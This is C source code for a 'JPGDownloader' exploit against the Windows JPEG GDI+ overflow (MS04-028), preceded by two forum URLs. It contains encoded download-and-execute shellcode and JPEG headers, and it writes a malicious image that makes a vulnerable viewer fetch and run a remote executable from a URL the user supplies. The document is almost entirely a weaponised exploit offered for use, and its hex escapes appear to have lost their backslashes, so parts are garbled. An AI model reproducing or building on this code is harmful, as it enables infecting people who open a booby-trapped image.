http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=2135
[url]http://www.leftworld.net/wenzhang/show.php?id=801[/url]
/*
===============================================================
Windows JPEG GDI+ Overflow Download Shellcoded Exploit (MS04-028) - JPGDownloader
Coded By ATmaCA
Credit to eEye Digital Security, K-OTik Security, FoToZ, pathetic.
E-Mail:[email protected]
Web:[url]www.prohack.net[/url]
===============================================================
*/
#include <windows.h>
#include <stdio.h>
/*
Generic win32 http download shellcode
You can put approx 2500 bytes of shellcode...
But the shell code can not contain 0xFFh 0xD9
because it is the marker for end of jpeg image.
*/
char shellcode[]=
"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"
"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"
"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"
"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"
"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"
"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"
"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"
"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"
"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"
"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"
"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"
"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"
"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"
"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"
"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"
"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"
"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"
"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"
"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"
"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"
"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"
"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"
"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"
"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"
"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"
"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"
"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"
"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"
"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"
"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"
"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"
"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"
"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"
"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"
"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"
"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"
"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"
"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"
"x27x39x72x6Fx72x17"
"m00!";
/*Using Heap Overflow Trigger DWORD - 01 length field*/
/*0xFF 0xFE 0x00 0x01*/
char header1[]=
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"
"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"
"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"
"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"
"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"
"x2Ex3Ex35x35x35x35x35x3E";
char setNOPs1[]=
"xE8x00x00x00x00x5Bx8Dx8B"
"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char setNOPs2[]=
"x3ExE8x00x00x00x00x5Bx8Dx8B"
"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
/*Image here*/
char header2[]=
"x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"
"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"
"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"
"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"
"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"
"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"
"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"
"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"
"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"
"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"
"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"
"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"
"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"
"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"
"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"
"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"
"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"
"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"
"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"
"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"
"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"
"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"
"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"
"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"
"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"
"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"
"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"
"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"
"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"
"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"
"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"
"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"
"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"
"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"
"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"
"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"
"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"
"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"
"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"
"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"
"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"
"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"
"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"
"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"
"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"
"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"
"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"
"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"
"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"
"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"
"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"
"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"
"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"
"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"
"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"
"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"
"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"
"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"
"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"
"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"
"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"
"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"
"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"
"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"
"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"
"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"
"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"
"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"
"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"
"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"
"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68"
;
int main(int argc, char *argv[])
{
if (argc < 3)
{
printf("rnJpeg Downloader V1.0 Consolern", argv[0]);
printf("Coded By ATmaCArn");
printf("Credit to eEye Digital Security,K-OTik Security,FoToZ,patheticrn");
printf("E-Mail:[email protected]");
printf("Web:www.prohack.net;rnrn");
printf("Usage:rnJpeg_Down <DownloadUrl> <OutputPath>rnrn",argv[0]);
printf("Example:Jpeg_Down [url]http://www.yoursite.com/server.exe[/url] mypic.jpgn");
return 0;
}
char *newshellcode = new char[sizeof(shellcode)+strlen(argv[1])+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,argv[1]);
strcat(newshellcode,"x01");
FILE *fout;
unsigned int i=0,j=0;
if( (fout=fopen(argv[2],"wb")) == NULL )
{
printf("Error opening file!n");
return 0;
}
j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i=0;i<sizeof(header1)-1;i++)
fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2[i],fout);
for(i=j;i<0x63c;i++)
fputc(0x90,fout);
j=i;
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++)
fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++)
fputc(setNOPs2[j],fout);
/* it is the marker for end of jpeg image*/
fprintf(fout,"xFFxD9");
fclose(fout);
printf("The Jpeg Server, has been created.with your settings.n");
return 0;
}